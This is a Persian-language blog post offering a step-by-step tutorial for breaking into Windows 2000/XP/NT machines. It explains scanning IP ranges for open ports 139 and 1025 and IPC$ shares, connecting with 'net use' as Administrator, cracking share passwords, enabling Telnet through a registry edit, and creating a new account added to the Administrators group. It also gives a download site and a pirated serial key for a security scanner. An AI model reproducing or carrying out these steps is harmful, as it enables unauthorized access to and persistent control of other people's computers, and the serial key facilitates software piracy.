آموزش هک ویندوز 2000,xp,nt


یکی از مشکلات بزرگ ویندوز که در Service pack های ویندوز هم وجود داره IPC هست

حالا ما با استفاده از این روش کارمون را شروع میکنیم .

یکی از نرم افزار های مورد نیاز GFI:LANguard Security Scaner هست که بخاطر قدرت و کارایی این برنامه را پیشنهاد میکنم که فقط باید یکسری

تغییرات رو روی آن انجام بدین این برنامه را از سایت زیر داونلود کنید

http://www.kyzj.com/

Serial:6J7FF-OL03J-9OHQB-1Q0XZ-F7PLZKH5TY-K1GSN-7BT5F-78A0B-CSKYU

البته ورژن 3.3 هم هست ولی من ورژن 3.2 را پیشنهاد میکنم که در سایت بالا ورژن 3.2 وجود دارد و سریال بالا نیز مربوط به همین ورژن هست

حالا باید یکسری تغییرات در این برنامه بدیم .

1.option را انتخاب کنید و به قسمت Scanning بروید و این شاخه را انتخاب کنید Configure ports و حالا در قسمت

Port number/range:1025

port desciription:network blackjacket

و حالا ADD PORT را بزنید .

در قسمت New scan باید یک Range ای پی رو اسکن کنید تا یک ای پی با مشخصات زیر پیدا شود

پرت های باز 1025,139 را داشته باشد .

IPC share نیز داشته باشد

حالا باید به این ای پی به صورت زیر کانکت شوید :

1.در قسمت Run این جمله را وارد کنید CMD

2. دستور زیر را وارد کنید :

Net use IpadressIPC$""/user:Administrator

اگر دستور زیر را دریافت کردین

Successfully The Command was completed

از ای پی مورد نظر Share گرفتین و در اختیار شماست اما در غیر اینصورت Share دارای پسوورد میباشد که من برای کرک کردن پسسوورد از این برنامه

استقاده میکنم :

PQWAK

که این برنامه رو از سایت Download.com دریافت کنید .

بعد از کرک از پسوورد بدست آمده اینگونه استفاده کنید

Net use ipadressIPC$ "password"/user:administrator

در صورتیکه میخواهید با Telnet کانکت شوید مراحل زیر را طی کنید .

در قسمت RUN تایپ کنید Regedit

به این آدرس بروید HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0NTLM

حالا Value date این فایل رو به این جمله تغییر دهید : 21

در قسمت بعدی به RUN بروید و این دستور را تایپ کنید TELNET

دستور زیر را وارد کنید Telnet ipadress

در ادامه اگر از شما یوزر و پسوورد خواست یوزر را Administrator و پسورد را خالی بگذارید

حالا احتیاج به ساختن یک یوزر برای خود دارید . این دستور را در ادامه وارد کنید :

Net user username password/add

حالا برای قرار دادن یوزر خود در گروه ادمین ها این دستور را وارد کنید

Net groups Administrators username/add

تمام شد شما به هدف خود رسیده اید اما من برای تازه کارها روش اول را پیشنهاد میکنم

ولی دوستان دیگر میتوانند از Telnet استفاده کنند

نکته : من هیچ مسئولیتی در مورد تغییر رجیستری نمیپذیرم اگر شما قادر به Edit رجیستری نیستید بهتره از آن یه Backup تهیه کنید یا

در نهایت از روش اول استفاده کنید .
نظرات 0 + ارسال نظر
برای نمایش آواتار خود در این وبلاگ در سایت Gravatar.com ثبت نام کنید. (راهنما)
ایمیل شما بعد از ثبت نمایش داده نخواهد شد